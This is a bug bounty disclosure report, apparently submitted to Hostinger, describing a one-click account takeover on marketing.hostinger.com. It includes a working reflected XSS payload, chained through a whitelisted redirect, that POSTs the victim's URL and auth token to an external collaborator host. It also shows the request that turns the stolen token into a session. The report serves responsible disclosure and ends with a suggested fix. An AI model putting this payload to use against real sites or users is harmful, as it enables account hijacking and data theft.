1 Click Account Takeover via Auth Token Theft on marketing.hostinger.com

## Summary: Hey Paul, hope you're doing good ! I discovered a One Click Account Takeover vulnerability in Hostinger through the ```marketing.hostinger.com``` subdomain. Since this subdomain is part of hostinger.com and is whitelisted for redirects, an attacker can exploit it to steal Hostinger users’ auth tokens and gain full access to their accounts with just a single click from the victims ! ## Steps To Reproduce: - Login in to the victim's account and visit the URL below, replace the attacker-url with your own burp collaborator url or your own dedicated server url: ``` https://auth.hostinger.com/login/?redirectUrl=https%3A%2F%2Fmarketing.hostinger.com%2Fen-us%2Fmarketplace_wix%2Fsite_not_published%3Fredirect_url%3Dx%22%3E%3C%2Fa%3E%3Cscript%3Efetch%28%27https%3A%2F%2Fwqqf8xerhgrhdk251cesqastbkhb54xsm.oastify.com%27%2C%20%7Bmethod%3A%20%27POST%27%2Cbody%3A%20window.location%7D%29%3C%2Fscript%3E ## Decoded URL: https://auth.hostinger.com/login/?redirectUrl=https://marketing.hostinger.com/en-us/marketplace_wix/site_not_published?redirect_url=x"></a><script>fetch('wqqf8xerhgrhdk251cesqastbkhb54xsm.oastify.com',%20{method:%20'POST',body:%20window.location});</script> ``` - Check burp collaborator / server logs for the victim's account auth token : {F4227740} - The attacker can use the leaked auth token to generate a valid JWT for the victim's account and have complete control over the victim's account using the following request: ``` POST /hpanel/auth/auth-token HTTP/2 Host: builder-backend.hostinger.com User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/132.0 Origin: https://builder.hostinger.com Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Te: trailers ``` {F4227728} ██████ ## Suggestion: I believe that ```marketing.hostinger.com``` has been rebranded as ```rankingcoach.com```. Therefore, it would be best to either shut down the marketing subdomain or remove it from the whitelisted domains. This would be a quick and easy fix to mitigate the issue and enhance users security. Thank you, @aziz0x48 ## Supporting Material/References: Please refer to the attached screenshots and video. ## Impact This vulnerability poses a significant risk to Hostinger users, as it allows attackers to bypass authentication and gain unauthorized access to accounts with just one click. By exploiting the ```marketing.hostinger.com``` subdomain, which is whitelisted for redirects, attackers can steal authentication tokens from users. Once the tokens are compromised, the attacker gains full access to the victim’s Hostinger account, including critical services such as hPanel, website builder, VPS servers, email, and personal data. This flaw puts all Hostinger users at risk of account takeover, data theft, and potential misuse of sensitive information, making it a serious security concern that requires immediate attention.